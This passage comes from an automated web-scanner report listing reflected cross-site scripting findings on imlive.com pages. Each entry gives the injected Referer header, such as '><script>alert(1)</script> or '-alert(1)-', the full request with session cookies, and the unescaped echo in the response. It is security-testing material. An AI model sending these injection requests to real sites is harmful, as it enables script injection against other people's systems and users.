Path:	/categoryfs.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4ad1'><script>alert(1)</script>5d132d65cec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryfs.asp?cat=232 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=c4ad1'><script>alert(1)</script>5d132d65cec

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:01 GMT
Connection: close
Content-Length: 19002
Vary: Accept-Encoding

<html>
   <head>
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
       <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title>
       <meta name="d
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryfs.asp?cat=232&lr=1107816009&ud=0&pe=categoryfs.asp&rf=http://www.google.com/search?hl=en^q=c4ad1'><script>alert(1)</script>5d132d65cec&qs=cat=232&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.942. http://imlive.com/categoryfs.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/categoryfs.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b27c2'><script>alert(1)</script>5c3f838203 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryfs.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=b27c2'><script>alert(1)</script>5c3f838203

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:26 GMT
Connection: close
Content-Length: 8327
Vary: Accept-Encoding

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/404.asp&lr=1107816009&ud=0&pe=404.asp&rf=http://www.google.com/search?hl=en^q=b27c2'><script>alert(1)</script>5c3f838203&qs=404;http://imlive.com:80/404.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.943. http://imlive.com/categoryms.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/categoryms.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aec77'><script>alert(1)</script>01882fe6e1e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryms.asp?cat=2 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=aec77'><script>alert(1)</script>01882fe6e1e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:02 GMT
Connection: close
Content-Length: 21894
Vary: Accept-Encoding

<html>
   <head>
       <title>Mysticism & Spirituality Live Video Chat at ImLive</title>
       <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryms.asp?cat=2&lr=1107816009&ud=0&pe=categoryms.asp&rf=http://www.google.com/search?hl=en^q=aec77'><script>alert(1)</script>01882fe6e1e&qs=cat=2&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.944. http://imlive.com/categoryms.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/categoryms.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 69bb4'><script>alert(1)</script>8751657e5a8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryms.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=69bb4'><script>alert(1)</script>8751657e5a8

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:26 GMT
Connection: close
Content-Length: 8328
Vary: Accept-Encoding

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/404.asp&lr=1107816009&ud=0&pe=404.asp&rf=http://www.google.com/search?hl=en^q=69bb4'><script>alert(1)</script>8751657e5a8&qs=404;http://imlive.com:80/404.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.945. http://imlive.com/customerservice.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/customerservice.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5eb49'><script>alert(1)</script>a0a4a130032 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /customerservice.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=5eb49'><script>alert(1)</script>a0a4a130032

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:15 GMT
Connection: close
Content-Length: 14451
Vary: Accept-Encoding

<HTML>
   <HEAD>
       <title>Customer Service - Live Video Chat at ImLive</title>
       <meta name="description" content="You are very important to us, and we strive to provide you with world class custom
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/help/guide/guide.asp&lr=1107816009&ud=0&pe=help/guide/guide.asp&rf=http://www.google.com/search?hl=en^q=5eb49'><script>alert(1)</script>a0a4a130032&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.946. http://imlive.com/disclaimer.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/disclaimer.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3d32e'><script>alert(1)</script>90577f18320 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /disclaimer.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=3d32e'><script>alert(1)</script>90577f18320

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:52 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:51 GMT
Connection: close
Content-Length: 78924
Vary: Accept-Encoding

<html>
   <head>
       <title>Disclaimer - Live Video Chat at ImLive</title>

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" typ
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/disclaimer.asp&lr=1107816009&ud=0&pe=disclaimer.asp&rf=http://www.google.com/search?hl=en^q=3d32e'><script>alert(1)</script>90577f18320&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.947. http://imlive.com/forgot.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/forgot.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1365d'-alert(1)-'8c7ad16a976 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /forgot.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=1365d'-alert(1)-'8c7ad16a976

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:38 GMT
Connection: close
Content-Length: 3308
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Imlive.com Customer Serv
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx&rf=http://www.google.com/search?hl=en^q=1365d'-alert(1)-'8c7ad16a976&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.948. http://imlive.com/forgot.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/forgot.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f31f'-alert(1)-'d8c094b7adb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /forgot.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=9f31f'-alert(1)-'d8c094b7adb

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:47 GMT
Connection: close
Content-Length: 3308
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Imlive.com Customer Serv
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx&rf=http://www.google.com/search?hl=en^q=9f31f'-alert(1)-'d8c094b7adb&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.949. http://imlive.com/homepagems3.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/homepagems3.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3d10'><script>alert(1)</script>76788ffdb68 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /homepagems3.asp HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000
Referer: http://www.google.com/search?hl=en&q=e3d10'><script>alert(1)</script>76788ffdb68

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:05:14 GMT
Server: Microsoft-IIS/7.0
